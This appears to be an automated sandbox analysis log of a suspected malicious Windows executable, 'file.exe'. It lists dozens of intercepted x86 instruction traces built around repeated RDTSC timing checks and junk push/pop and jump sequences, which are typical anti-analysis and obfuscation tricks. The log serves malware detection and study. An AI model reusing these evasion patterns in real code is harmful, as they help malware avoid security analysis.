              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D5F5C second address: 8D5F7D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3D50D0EC77h 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D5F7D second address: 8D5F83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D5F83 second address: 8D5F87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D5F87 second address: 8D5FAB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3D507EA96Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jnp 00007F3D507EA966h 0x00000014 jc 00007F3D507EA966h 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D5FAB second address: 8D5FC1 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F3D50D0EC66h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jno 00007F3D50D0EC66h 0x00000013 push edi 0x00000014 pop edi 0x00000015 popad 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D4FCB second address: 8D4FE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop eax 0x00000006 jg 00007F3D507EA980h 0x0000000c push eax 0x0000000d push edx 0x0000000e je 00007F3D507EA966h 0x00000014 jne 00007F3D507EA966h 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D4FE5 second address: 8D4FEB instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D5C7B second address: 8D5C7F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D5C7F second address: 8D5C87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D5C87 second address: 8D5C98 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3D507EA96Ch 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8DBE10 second address: 8DBE14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8DBE14 second address: 8DBE24 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F3D507EA966h 0x00000008 jl 00007F3D507EA966h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8DBE24 second address: 8DBE5D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3D50D0EC73h 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F3D50D0EC78h 0x0000000e jmp 00007F3D50D0EC6Ah 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8DBE5D second address: 8DBE61 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8DBF9B second address: 8DBFA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8DBFA2 second address: 8DBFC7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push esi 0x00000004 pop esi 0x00000005 jmp 00007F3D507EA975h 0x0000000a pop eax 0x0000000b jne 00007F3D507EA96Eh 0x00000011 push esi 0x00000012 pop esi 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8EAAE9 second address: 8EAAF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F3D50D0EC66h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8EAAF3 second address: 8EAB24 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop ebx 0x0000000a jmp 00007F3D507EA974h 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F3D507EA971h 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8EAB24 second address: 8EAB28 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F8915 second address: 8F8919 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F8919 second address: 8F8923 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F3D50D0EC66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F8923 second address: 8F892E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007F3D507EA966h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E10A9 second address: 7E10B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E10B0 second address: 7E10B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F8546 second address: 8F854A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F854A second address: 8F8558 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F3D507EA966h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d pop eax 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F869A second address: 8F86A6 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F3D50D0EC66h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9119E7 second address: 9119F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop ebx 0x00000007 jc 00007F3D507EA96Ch 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9119F6 second address: 911A2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jmp 00007F3D50D0EC6Eh 0x0000000a jp 00007F3D50D0EC66h 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 popad 0x00000013 jng 00007F3D50D0EC6Ch 0x00000019 js 00007F3D50D0EC66h 0x0000001f popad 0x00000020 jc 00007F3D50D0EC7Ah 0x00000026 jo 00007F3D50D0EC6Ch 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9108C3 second address: 9108F1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F3D507EA974h 0x00000008 push edi 0x00000009 pop edi 0x0000000a jg 00007F3D507EA966h 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 jc 00007F3D507EA966h 0x00000019 js 00007F3D507EA966h 0x0000001f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 910A1C second address: 910A4C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3D50D0EC78h 0x00000009 jmp 00007F3D50D0EC74h 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91115B second address: 91117D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F3D507EA966h 0x0000000a popad 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F3D507EA974h 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91129F second address: 9112A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9112A6 second address: 9112AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9112AC second address: 9112B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F3D50D0EC66h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 911422 second address: 91142E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 ja 00007F3D507EA966h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91142E second address: 911441 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007F3D50D0EC66h 0x00000009 push esi 0x0000000a pop esi 0x0000000b js 00007F3D50D0EC66h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9115B2 second address: 9115DD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3D507EA977h 0x00000007 jbe 00007F3D507EA966h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jmp 00007F3D507EA96Ah 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91173F second address: 911752 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jmp 00007F3D50D0EC6Eh 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 911752 second address: 91175B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91175B second address: 911763 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 915A88 second address: 915A8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 915A8D second address: 915A92 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 915A92 second address: 915AB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007F3D507EA977h 0x00000014 popad 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 915D6D second address: 915D71 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 915D71 second address: 915D7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 915D7B second address: 915D7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 915D7F second address: 915D83 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91761D second address: 917621 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D703A9 second address: 4D703AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D703AD second address: 4D703B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D703B3 second address: 4D703EB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F3D507EA978h 0x00000008 mov ax, 3B61h 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f xchg eax, ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F3D507EA973h 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D703EB second address: 4D703F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D703F1 second address: 4D703F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D703F5 second address: 4D7041D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3D50D0EC6Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F3D50D0EC74h 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D7041D second address: 4D70423 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D70423 second address: 4D70442 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3D50D0EC6Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov ebx, 12BE07CEh 0x00000014 mov dl, D2h 0x00000016 popad 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA041E second address: 4DA045B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, 6182h 0x00000007 pushfd 0x00000008 jmp 00007F3D507EA973h 0x0000000d jmp 00007F3D507EA973h 0x00000012 popfd 0x00000013 popad 0x00000014 pop edx 0x00000015 pop eax 0x00000016 xchg eax, ebp 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a movsx edi, si 0x0000001d mov dx, cx 0x00000020 popad 0x00000021 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA045B second address: 4DA04D0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3D50D0EC79h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b movzx esi, bx 0x0000000e popad 0x0000000f xchg eax, ebp 0x00000010 jmp 00007F3D50D0EC75h 0x00000015 mov ebp, esp 0x00000017 jmp 00007F3D50D0EC6Eh 0x0000001c xchg eax, ecx 0x0000001d pushad 0x0000001e pushfd 0x0000001f jmp 00007F3D50D0EC6Eh 0x00000024 sbb cl, 00000068h 0x00000027 jmp 00007F3D50D0EC6Bh 0x0000002c popfd 0x0000002d mov esi, 0E90ED5Fh 0x00000032 popad 0x00000033 push eax 0x00000034 push eax 0x00000035 push edx 0x00000036 pushad 0x00000037 push eax 0x00000038 push edx 0x00000039 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA04D0 second address: 4DA04F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F3D507EA96Ch 0x0000000a and esi, 76E91DC8h 0x00000010 jmp 00007F3D507EA96Bh 0x00000015 popfd 0x00000016 popad 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA04F4 second address: 4DA0539 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3D50D0EC79h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ecx 0x0000000a pushad 0x0000000b jmp 00007F3D50D0EC6Ch 0x00000010 jmp 00007F3D50D0EC72h 0x00000015 popad 0x00000016 xchg eax, esi 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA0539 second address: 4DA0556 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3D507EA979h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA0556 second address: 4DA059E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3D50D0EC71h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F3D50D0EC71h 0x0000000f xchg eax, esi 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 pushfd 0x00000014 jmp 00007F3D50D0EC6Ah 0x00000019 xor ecx, 2B1D1278h 0x0000001f jmp 00007F3D50D0EC6Bh 0x00000024 popfd 0x00000025 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA059E second address: 4DA05F9 instructions: 0x00000000 rdtsc 0x00000002 mov cx, 65AFh 0x00000006 pop edx 0x00000007 pop eax 0x00000008 call 00007F3D507EA974h 0x0000000d pushfd 0x0000000e jmp 00007F3D507EA972h 0x00000013 add ecx, 2D577C08h 0x00000019 jmp 00007F3D507EA96Bh 0x0000001e popfd 0x0000001f pop ecx 0x00000020 popad 0x00000021 lea eax, dword ptr [ebp-04h] 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007F3D507EA971h 0x0000002d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA05F9 second address: 4DA05FF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA05FF second address: 4DA0616 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3D507EA973h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA0616 second address: 4DA0679 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3D50D0EC79h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c jmp 00007F3D50D0EC6Eh 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 mov ecx, 5F9B1AC3h 0x0000001a pushfd 0x0000001b jmp 00007F3D50D0EC78h 0x00000020 add eax, 1BE42588h 0x00000026 jmp 00007F3D50D0EC6Bh 0x0000002b popfd 0x0000002c popad 0x0000002d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA0679 second address: 4DA06C1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3D507EA979h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a jmp 00007F3D507EA96Eh 0x0000000f push dword ptr [ebp+08h] 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F3D507EA977h 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA0700 second address: 4DA0704 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA0704 second address: 4DA070A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA070A second address: 4DA0739 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3D50D0EC6Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 cmp dword ptr [ebp-04h], 00000000h 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F3D50D0EC77h 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA0739 second address: 4DA0767 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3D507EA979h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov esi, eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F3D507EA96Dh 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA0767 second address: 4DA076D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA076D second address: 4DA07A0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3D507EA973h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b je 00007F3D507EA9CDh 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F3D507EA970h 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA07A0 second address: 4DA07AF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3D50D0EC6Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA07AF second address: 4DA07C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3D507EA974h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA0807 second address: 4DA081F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3D50D0EC74h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA081F second address: 4D90007 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3D507EA96Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b leave 0x0000000c jmp 00007F3D507EA976h 0x00000011 retn 0004h 0x00000014 nop 0x00000015 cmp eax, 00000000h 0x00000018 setne al 0x0000001b xor ebx, ebx 0x0000001d test al, 01h 0x0000001f jne 00007F3D507EA967h 0x00000021 xor eax, eax 0x00000023 sub esp, 08h 0x00000026 mov dword ptr [esp], 00000000h 0x0000002d mov dword ptr [esp+04h], 00000000h 0x00000035 call 00007F3D54F43DA3h 0x0000003a mov edi, edi 0x0000003c pushad 0x0000003d push eax 0x0000003e push edx 0x0000003f pushad 0x00000040 popad 0x00000041 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D90007 second address: 4D9003B instructions: 0x00000000 rdtsc 0x00000002 movsx edx, si 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push ecx 0x00000008 pushad 0x00000009 popad 0x0000000a pop edi 0x0000000b popad 0x0000000c xchg eax, ebp 0x0000000d pushad 0x0000000e mov edx, ecx 0x00000010 pushad 0x00000011 mov dl, ah 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 popad 0x00000017 push eax 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F3D50D0EC78h 0x00000021 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D9003B second address: 4D9004A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3D507EA96Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D9004A second address: 4D9005F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, 741A0CCAh 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov cx, bx 0x00000012 mov eax, ebx 0x00000014 popad 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D9005F second address: 4D90070 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F3D507EA96Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D90070 second address: 4D900AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov ebp, esp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c call 00007F3D50D0EC73h 0x00000011 pop ecx 0x00000012 jmp 00007F3D50D0EC79h 0x00000017 popad 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D902AA second address: 4D902BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3D507EA96Eh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D902BC second address: 4D90360 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3D50D0EC6Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, esi 0x0000000c pushad 0x0000000d call 00007F3D50D0EC74h 0x00000012 pushfd 0x00000013 jmp 00007F3D50D0EC72h 0x00000018 and si, C418h 0x0000001d jmp 00007F3D50D0EC6Bh 0x00000022 popfd 0x00000023 pop eax 0x00000024 push edi 0x00000025 mov eax, 7D3AE9EBh 0x0000002a pop esi 0x0000002b popad 0x0000002c push eax 0x0000002d pushad 0x0000002e mov cl, ABh 0x00000030 pushfd 0x00000031 jmp 00007F3D50D0EC79h 0x00000036 or ecx, 7E6E9866h 0x0000003c jmp 00007F3D50D0EC71h 0x00000041 popfd 0x00000042 popad 0x00000043 xchg eax, esi 0x00000044 push eax 0x00000045 push edx 0x00000046 pushad 0x00000047 jmp 00007F3D50D0EC73h 0x0000004c push eax 0x0000004d push edx 0x0000004e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D90360 second address: 4D90365 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
